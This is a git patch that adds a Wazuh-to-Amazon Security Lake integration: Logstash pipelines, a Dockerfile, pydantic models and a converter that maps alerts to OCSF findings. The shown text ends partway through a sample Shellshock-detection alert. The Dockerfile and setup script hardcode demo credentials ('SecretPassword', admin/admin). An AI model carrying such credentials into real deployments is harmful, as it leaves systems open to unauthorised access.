From bf4da82e254bb99a60acf9a2451545aa0d4d62a4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=81lex=20Ruiz?= <alejandro.ruiz.becerra@wazuh.com>
Date: Mon, 4 Mar 2024 10:07:47 +0100
Subject: [PATCH] Add Python module to accomplish OCSF compliant events (#159)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake

* Adding logstash pipeline for python script

* encode_parquet() function fixed to handle lists of dictionaries

* Correct error in encode_parquet()

* Avoid storing the block ending in the output buffer

* Add comments on handling files and streams with pyarrow for future reference

* Add s3 handling reference links

* Write parquet directly to bucket

* Added basics of map_to_ocsf() function

* Minor fixes

* Map alerts to OCSF as they are read

* Add script to convert Wazuh events to OCSF

Also adds a simple test script

* Add OCSF converter + Parquet encoder + test scripts

* Update .gitignore

* Include the contents of the alert under unmapped

* Add support for different OCSF schema versions

* Use custom ocsf module to map alerts

* Modify script to use converter class

* Code polish and fix errors

* Remove unnecessary type declaration from debug flag

* Improved parquet encoding

* Initial commit for test env's docker-compose.yml

* Remove sudo references from docker-compose.yml

* Add operational Python module to transform events to OCSF

* Create minimal Docker environment to test and develop the integration.

* Fix events-generator's Inventory starvation

* Remove files present in #147

* Cleanup

* Add FQDN hostnames to services for certificates creation

* Add S3 Ninja (Mock) (#165)

* Setup certificates in Wazuh Indexer and Logstash containers (#166)

* Add certificate generator service

* Add certificate config to docker compose file

* Use secrets for certificates

* Disable permission handling inside cert's generator entrypoint.sh

* Back to using a bind mount for certs

* Have entrypoint.sh generate certs with 1000:1000 ownership

* Correct certificate permissions and bind mounting

* Add security initialization variable to compose file

* Fix permissions on certs generator entrypoint

* Add cert generator config file

* Remove old cert generator dir

* Set indexer hostname right in pipeline file

* Roll back commented code

---------

Signed-off-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>
Co-authored-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>

* Fix Logstash pipelines

* Remove unused file

* Implement OCSF severity normalize function

---------

Signed-off-by: Álex Ruiz <alejandro.ruiz.becerra@wazuh.com>
Co-authored-by: Fede Tux <federico.galland@wazuh.com>
Co-authored-by: Federico Gustavo Galland <99492720+f-galland@users.noreply.github.com>
---
 integrations/.gitignore                       |   6 +
 integrations/README.md                        |  37 ++++
 .../amazon-security-lake/.dockerignore        | 180 ++++++++++++++++++
 integrations/amazon-security-lake/.gitignore  | 179 +++++++++++++++++
 integrations/amazon-security-lake/Dockerfile  |  41 ++++
 integrations/amazon-security-lake/README.md   |  15 +-
 .../logstash/pipeline/indexer-to-file.conf    |  28 +++
 .../pipeline/indexer-to-integrator.conf       |  30 +++
 .../pipeline/indexer-to-s3.conf}              |  11 +-
 .../amazon-security-lake/logstash/setup.sh    |  10 +
 .../amazon-security-lake/parquet/parquet.py   |  20 ++
 .../amazon-security-lake/parquet/test.py      |  10 +
 .../amazon-security-lake/requirements.txt     |   3 +
 integrations/amazon-security-lake/run.py      |  26 +++
 .../transform/__init__.py                     |   1 +
 .../transform/converter.py                    |  98 ++++++++++
 .../transform/models/__init__.py              |   2 +
 .../transform/models/ocsf.py                  |  66 +++++++
 .../transform/models/wazuh.py                 |  50 +++++
 .../wazuh-event.sample.json                   |  76 ++++++++
 integrations/docker/amazon-security-lake.yml  | 115 +++++++++++
 integrations/docker/config/certs.yml          |  16 ++
 .../tools/events-generator/.dockerignore      |   2 +
 .../tools/events-generator/Dockerfile         |   4 +
 integrations/tools/events-generator/README.md |  11 ++
 integrations/tools/events-generator/run.py    |  19 +-
 26 files changed, 1044 insertions(+), 12 deletions(-)
 create mode 100644 integrations/.gitignore
 create mode 100644 integrations/README.md
 create mode 100644 integrations/amazon-security-lake/.dockerignore
 create mode 100644 integrations/amazon-security-lake/.gitignore
 create mode 100644 integrations/amazon-security-lake/Dockerfile
 create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
 create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
 rename integrations/amazon-security-lake/{wazuh-s3.conf => logstash/pipeline/indexer-to-s3.conf} (78%)
 create mode 100644 integrations/amazon-security-lake/logstash/setup.sh
 create mode 100644 integrations/amazon-security-lake/parquet/parquet.py
 create mode 100644 integrations/amazon-security-lake/parquet/test.py
 create mode 100644 integrations/amazon-security-lake/requirements.txt
 create mode 100644 integrations/amazon-security-lake/run.py
 create mode 100644 integrations/amazon-security-lake/transform/__init__.py
 create mode 100644 integrations/amazon-security-lake/transform/converter.py
 create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py
 create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py
 create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py
 create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json
 create mode 100644 integrations/docker/amazon-security-lake.yml
 create mode 100644 integrations/docker/config/certs.yml
 create mode 100644 integrations/tools/events-generator/.dockerignore
 create mode 100644 integrations/tools/events-generator/Dockerfile

diff --git a/integrations/.gitignore b/integrations/.gitignore
new file mode 100644
index 0000000000000..ee1a01f52633d
--- /dev/null
+++ b/integrations/.gitignore
@@ -0,0 +1,6 @@
+elastic
+opensearch
+splunk
+common
+config
+docker/certs
\ No newline at end of file
diff --git a/integrations/README.md b/integrations/README.md
new file mode 100644
index 0000000000000..ae3253b8547b8
--- /dev/null
+++ b/integrations/README.md
@@ -0,0 +1,37 @@
+## Wazuh indexer integrations
+
+This folder contains integrations with third-party XDR, SIEM and cybersecurity software. 
+The goal is to transport Wazuh's analysis to the platform that suits your needs.
+
+### Amazon Security Lake
+
+Amazon Security Lake automatically centralizes security data from AWS environments, SaaS providers, 
+on premises, and cloud sources into a purpose-built data lake stored in your account. With Security Lake, 
+you can get a more complete understanding of your security data across your entire organization. You can 
+also improve the protection of your workloads, applications, and data. Security Lake has adopted the 
+Open Cybersecurity Schema Framework (OCSF), an open standard. With OCSF support, the service normalizes 
+and combines security data from AWS and a broad range of enterprise security data sources.
+
+##### Usage
+
+A demo of the integration can be started using the content of this folder and Docker.
+
+```console
+docker compose -f ./docker/amazon-security-lake.yml up -d
+```
+
+This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node, 
+a *logstash* node and our event generator. On the one hand, the event generator will push events 
+constantly to the indexer. On the other hand, logstash will constantly query for new data and
+deliver it to the integration Python program, also present in that node. Finally, the integration 
+module will prepare and send the data to the Amazon Security Lake's S3 bucket. 
+<!-- TODO continue with S3 credentials setup -->
+
+For production usage, follow the instructions in our documentation page about this matter.
+(_when-its-done_)
+
+As a last note, we would like to point out that we also use this Docker environment for development.
+
+### Other integrations
+
+TBD
diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore
new file mode 100644
index 0000000000000..891ff7a135014
--- /dev/null
+++ b/integrations/amazon-security-lake/.dockerignore
@@ -0,0 +1,180 @@
+wazuh-event.ocsf.json
+*.parquet
+Dockerfile
+
+# Created by https://www.toptal.com/developers/gitignore/api/python
+# Edit at https://www.toptal.com/developers/gitignore?templates=python
+
+### Python ###
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+### Python Patch ###
+# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration
+poetry.toml
+
+# ruff
+.ruff_cache/
+
+# LSP config files
+pyrightconfig.json
+
+# End of https://www.toptal.com/developers/gitignore/api/python
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore
new file mode 100644
index 0000000000000..0740f723d0c79
--- /dev/null
+++ b/integrations/amazon-security-lake/.gitignore
@@ -0,0 +1,179 @@
+wazuh-event.ocsf.json
+*.parquet
+
+# Created by https://www.toptal.com/developers/gitignore/api/python
+# Edit at https://www.toptal.com/developers/gitignore?templates=python
+
+### Python ###
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+### Python Patch ###
+# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration
+poetry.toml
+
+# ruff
+.ruff_cache/
+
+# LSP config files
+pyrightconfig.json
+
+# End of https://www.toptal.com/developers/gitignore/api/python
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile
new file mode 100644
index 0000000000000..a2eec0f8d6075
--- /dev/null
+++ b/integrations/amazon-security-lake/Dockerfile
@@ -0,0 +1,41 @@
+# MULTI-STAGE build
+
+FROM python:3.9 as builder
+# Create a virtualenv for dependencies. This isolates these packages from
+# system-level packages.
+RUN python3 -m venv /env
+# Setting these environment variables are the same as running
+# source /env/bin/activate.
+ENV VIRTUAL_ENV /env
+ENV PATH /env/bin:$PATH
+# Copy the application's requirements.txt and run pip to install all
+# dependencies into the virtualenv.
+COPY requirements.txt /app/requirements.txt
+RUN pip install -r /app/requirements.txt
+
+
+FROM python:3.9
+ENV LOGSTASH_KEYSTORE_PASS="SecretPassword"
+# Add the application source code.
+COPY --chown=logstash:logstash . /home/app
+# Add execution persmissions.
+RUN chmod a+x /home/app/run.py
+# Copy the application's dependencies.
+COPY --from=builder /env /env
+
+# Install Logstash
+RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https
+RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \
+    echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \
+    apt-get update && apt install -y logstash
+# Install logstash-input-opensearch plugin.
+RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
+# Copy the Logstash's ingestion pipelines.
+COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline
+# Grant logstash ownership over its files
+RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash
+
+USER logstash
+# Copy and run the setup.sh script to create and configure a keystore for Logstash.
+COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh
+RUN bash /usr/share/logstash/bin/setup.sh
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md
index 46eee1b92a4b0..1dbe1dd4ebb23 100644
--- a/integrations/amazon-security-lake/README.md
+++ b/integrations/amazon-security-lake/README.md
@@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf -
 # Start Logstash
 sudo systemctl enable logstash
 sudo systemctl start logstash
-```
\ No newline at end of file
+```
+
+
+### Building the Docker image
+
+```console
+docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain
+```
+
+
+Run with: 
+```console
+docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls
+```
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
new file mode 100644
index 0000000000000..4d5a47169e197
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf
@@ -0,0 +1,28 @@
+input {
+   opensearch {
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
+      ssl => true
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
+      query =>  '{
+            "query": {
+               "range": {
+                  "@timestamp": {
+                     "gt": "now-1m"
+                  }
+               }
+            }
+      }'
+      target => "_source"
+      schedule => "* * * * *"
+   }
+}
+
+
+output {
+   file {
+      path => "/usr/share/logstash/pipeline/indexer-to-file.json"
+   }
+}
diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
new file mode 100644
index 0000000000000..81a4bdad5883a
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf
@@ -0,0 +1,30 @@
+input {
+   opensearch {
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
+      ssl => true
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
+      query =>  '{
+            "query": {
+               "range": {
+                  "@timestamp": {
+                     "gt": "now-1m"
+                  }
+               }
+            }
+      }'
+      target => "_source"
+      schedule => "* * * * *"
+   }
+}
+
+output {
+    pipe {
+        id => "securityLake"
+        message_format => "%{_source}"
+        ttl => "10"
+        command => "/usr/bin/env python3 /usr/local/bin/run.py -d"
+    }
+}
diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
similarity index 78%
rename from integrations/amazon-security-lake/wazuh-s3.conf
rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
index 108423afd3193..22d44b9d0d3f5 100644
--- a/integrations/amazon-security-lake/wazuh-s3.conf
+++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf
@@ -1,11 +1,11 @@
 input {
    opensearch {
-      hosts =>  ["localhost:9200"]
-      user  =>  "${WAZUH_INDEXER_USERNAME}"
-      password  =>  "${WAZUH_INDEXER_PASSWORD}"
-      index =>  "wazuh-alerts-4.x-*"
+      hosts =>  ["wazuh.indexer:9200"]
+      user  =>  "${INDEXER_USERNAME}"
+      password  =>  "${INDEXER_PASSWORD}"
       ssl => true
-      ca_file => "/etc/logstash/wi-certs/root-ca.pem"
+      ca_file => "/usr/share/logstash/root-ca.pem"
+      index =>  "wazuh-alerts-4.x-*"
       query =>  '{
             "query": {
                "range": {
@@ -15,6 +15,7 @@ input {
                }
             }
       }'
+      target => "_source"
       schedule => "* * * * *"
    }
 }
diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh
new file mode 100644
index 0000000000000..9527f1fa58362
--- /dev/null
+++ b/integrations/amazon-security-lake/logstash/setup.sh
@@ -0,0 +1,10 @@
+#!/usr/bin/bash
+
+# This script creates and configures a keystore for Logstash to store
+# indexer's credentials. NOTE: works only for dockerized logstash.
+#   Source: https://www.elastic.co/guide/en/logstash/current/keystore.html
+
+# Create keystore
+/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash
+echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash
diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py
new file mode 100644
index 0000000000000..79a146f0993a2
--- /dev/null
+++ b/integrations/amazon-security-lake/parquet/parquet.py
@@ -0,0 +1,20 @@
+
+import pyarrow as pa
+import pyarrow.parquet as pq
+import pyarrow.fs as pafs
+
+
+class Parquet:
+
+    @staticmethod
+    def encode(data: dict):
+        return pa.Table.from_pydict(data)
+
+    @staticmethod
+    def to_s3(data: pa.Table, s3: pafs.S3FileSystem):
+        pass
+
+    @staticmethod
+    def to_file(data: pa.Table, path: str):
+        # pq.write_to_dataset(table=data, root_path=path)
+        pq.write_table(data, path)
diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py
new file mode 100644
index 0000000000000..318da6ebe4740
--- /dev/null
+++ b/integrations/amazon-security-lake/parquet/test.py
@@ -0,0 +1,10 @@
+#!/usr/bin/python
+
+import pyarrow as pa
+from parquet import Parquet
+import json
+
+with open("wazuh-event.ocsf.json", "r") as fd:
+    events = [json.load(fd)]
+    table = pa.Table.from_pylist(events)
+    Parquet.to_file(table, "output/wazuh-event.ocsf.parquet")
diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt
new file mode 100644
index 0000000000000..8ebe50a4ef264
--- /dev/null
+++ b/integrations/amazon-security-lake/requirements.txt
@@ -0,0 +1,3 @@
+pyarrow>=10.0.1
+parquet-tools>=0.2.15
+pydantic==2.6.1
\ No newline at end of file
diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py
new file mode 100644
index 0000000000000..c26adffa2ea0f
--- /dev/null
+++ b/integrations/amazon-security-lake/run.py
@@ -0,0 +1,26 @@
+#!/env/bin/python3.9
+
+import transform
+import json
+
+
+def _test():
+    ocsf_event = {}
+    with open("./wazuh-event.sample.json", "r") as fd:
+        # Load from file descriptor
+        raw_event = json.load(fd)
+        try:
+            event = transform.converter.from_json(raw_event)
+            print(event)
+            ocsf_event = transform.converter.to_detection_finding(event)
+            print("")
+            print("--")
+            print("")
+            print(ocsf_event)
+
+        except KeyError as e:
+            raise (e)
+
+
+if __name__ == '__main__':
+    _test()
diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py
new file mode 100644
index 0000000000000..6e8733a32b85d
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/__init__.py
@@ -0,0 +1 @@
+import transform.converter
diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py
new file mode 100644
index 0000000000000..90f8eeef27bac
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/converter.py
@@ -0,0 +1,98 @@
+import json
+
+import pydantic
+import transform.models as models
+
+
+def normalize(level: int) -> int:
+    """
+    Normalizes rule level into the 0-6 range, required by OCSF.
+    """
+    if level >= 15:     # (5) Critical
+        severity = 5
+    elif level >= 11:   # (4) High
+        severity = 4
+    elif level >= 8:    # (3) Medium
+        severity = 3
+    elif level >= 4:    # (2) Low
+        severity = 2
+    elif level >= 0:    # (1) Informational
+        severity = 1
+    else:
+        severity = 0    # (0) Unknown
+
+    return severity
+
+
+def join(iterable, separator=","):
+    return (separator.join(iterable))
+
+
+def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding:
+    finding_info = models.ocsf.FindingInfo(
+        analytic=models.ocsf.AnalyticInfo(
+            category=", ".join(event.rule.groups),
+            name=event.decoder.name,
+            type_id=1,
+            uid=event.rule.id
+        ),
+        attacks=models.ocsf.AttackInfo(
+            tactic=models.ocsf.TechniqueInfo(
+                name=", ".join(event.rule.mitre.tactic),
+                uid=", ".join(event.rule.mitre.id)
+            ),
+            technique=models.ocsf.TechniqueInfo(
+                name=", ".join(event.rule.mitre.technique),
+                uid=", ".join(event.rule.mitre.id)
+            ),
+            version="v13.1"
+        ),
+        title=event.rule.description,
+        types=[event.input.type],
+        uid=event.id
+    )
+
+    metadata = models.ocsf.Metadata(
+        log_name="Security events",
+        log_provider="Wazuh",
+        product=models.ocsf.ProductInfo(
+            name="Wazuh",
+            lang="en",
+            vendor_name="Wazuh, Inc,."
+        ),
+        version="1.1.0"
+    )
+
+    resources = [models.ocsf.Resource(
+        name=event.agent.name, uid=event.agent.id)]
+
+    severity_id = normalize(event.rule.level)
+
+    unmapped = {
+        "data_sources": [
+            event.location,
+            event.manager.name
+        ],
+        "nist": event.rule.nist_800_53  # Array
+    }
+
+    return models.ocsf.DetectionFinding(
+        count=event.rule.firedtimes,
+        message=event.rule.description,
+        finding_info=finding_info,
+        metadata=metadata,
+        raw_data=event.full_log,
+        resources=resources,
+        risk_score=event.rule.level,
+        severity_id=severity_id,
+        time=event.timestamp,
+        unmapped=unmapped
+    )
+
+
+def from_json(event: dict) -> models.wazuh.Event:
+    # Needs to a string, bytes or bytearray
+    try:
+        return models.wazuh.Event.model_validate_json(json.dumps(event))
+    except pydantic.ValidationError as e:
+        print(e)
diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py
new file mode 100644
index 0000000000000..2fdec7bc648af
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/__init__.py
@@ -0,0 +1,2 @@
+import transform.models.wazuh
+import transform.models.ocsf
diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py
new file mode 100644
index 0000000000000..4918b6e29081c
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/ocsf.py
@@ -0,0 +1,66 @@
+import pydantic
+import typing
+
+
+class AnalyticInfo(pydantic.BaseModel):
+    category: str
+    name: str
+    type_id: int
+    uid: str
+
+
+class TechniqueInfo(pydantic.BaseModel):
+    name: str
+    uid: str
+
+
+class AttackInfo(pydantic.BaseModel):
+    tactic: TechniqueInfo
+    technique: TechniqueInfo
+    version: str
+
+
+class FindingInfo(pydantic.BaseModel):
+    analytic: AnalyticInfo
+    attacks: AttackInfo
+    title: str
+    types: typing.List[str]
+    uid: str
+
+
+class ProductInfo(pydantic.BaseModel):
+    name: str
+    lang: str
+    vendor_name: str
+
+
+class Metadata(pydantic.BaseModel):
+    log_name: str
+    log_provider: str
+    product: ProductInfo
+    version: str
+
+
+class Resource(pydantic.BaseModel):
+    name: str
+    uid: str
+
+
+class DetectionFinding(pydantic.BaseModel):
+    activity_id: int = 1
+    category_name: str = "Findings"
+    category_uid: int = 2
+    class_name: str = "Detection Finding"
+    class_uid: int = 2004
+    count: int
+    message: str
+    finding_info: FindingInfo
+    metadata: Metadata
+    raw_data: str
+    resources: typing.List[Resource]
+    risk_score: int
+    severity_id: int
+    status_id: int = 99
+    time: str
+    type_uid: int = 200401
+    unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field()
diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py
new file mode 100644
index 0000000000000..34aa3c91e96e1
--- /dev/null
+++ b/integrations/amazon-security-lake/transform/models/wazuh.py
@@ -0,0 +1,50 @@
+import pydantic
+import typing
+
+# =========== Wazuh event models =========== #
+# These are only the fields required for the integration.
+
+
+class Mitre(pydantic.BaseModel):
+    technique: typing.List[str] = []
+    id: typing.List[str] = ""
+    tactic: typing.List[str] = []
+
+
+class Rule(pydantic.BaseModel):
+    firedtimes: int = 0
+    description: str = ""
+    groups: typing.List[str] = []
+    id: str = ""
+    mitre: Mitre = Mitre()
+    level: int = 0
+    nist_800_53: typing.List[str] = []
+
+
+class Decoder(pydantic.BaseModel):
+    name: str
+
+
+class Input(pydantic.BaseModel):
+    type: str
+
+
+class Agent(pydantic.BaseModel):
+    name: str
+    id: str
+
+
+class Manager(pydantic.BaseModel):
+    name: str
+
+
+class Event(pydantic.BaseModel):
+    rule: Rule = {}
+    decoder: Decoder = {}
+    input: Input = {}
+    id: str = ""
+    full_log: str = ""
+    agent: Agent = {}
+    timestamp: str = ""
+    location: str = ""
+    manager: Manager = {}
diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json
new file mode 100644
index 0000000000000..d7e0558b62c62
--- /dev/null
+++ b/integrations/amazon-security-lake/wazuh-event.sample.json
@@ -0,0 +1,76 @@
+{
+  "input": {
+    "type": "log"
+  },
+  "agent": {
+    "name": "redacted.com",
+    "id": "000"
+  },
+  "manager": {
+    "name": "redacted.com"
+  },
+  "data": {
+    "protocol": "GET",
+    "srcip": "000.111.222.10",
+    "id": "404",
+    "url": "/cgi-bin/jarrewrite.sh"
+  },
+  "rule": {
+    "firedtimes": 1,
+    "mail": false,
+    "level": 6,
+    "pci_dss": [
+      "11.4"
+    ],
+    "tsc": [
+      "CC6.1",
+      "CC6.8",
+      "CC7.2",
+      "CC7.3"
+    ],
+    "description": "Shellshock attack attempt",
+    "groups": [
+      "web",
+      "accesslog",
+      "attack"
+    ],
+    "mitre": {
+      "technique": [
+        "Exploitation for Privilege Escalation",
+        "Exploit Public-Facing Application"
+      ],
+      "id": [
+        "T1068",
+        "T1190"
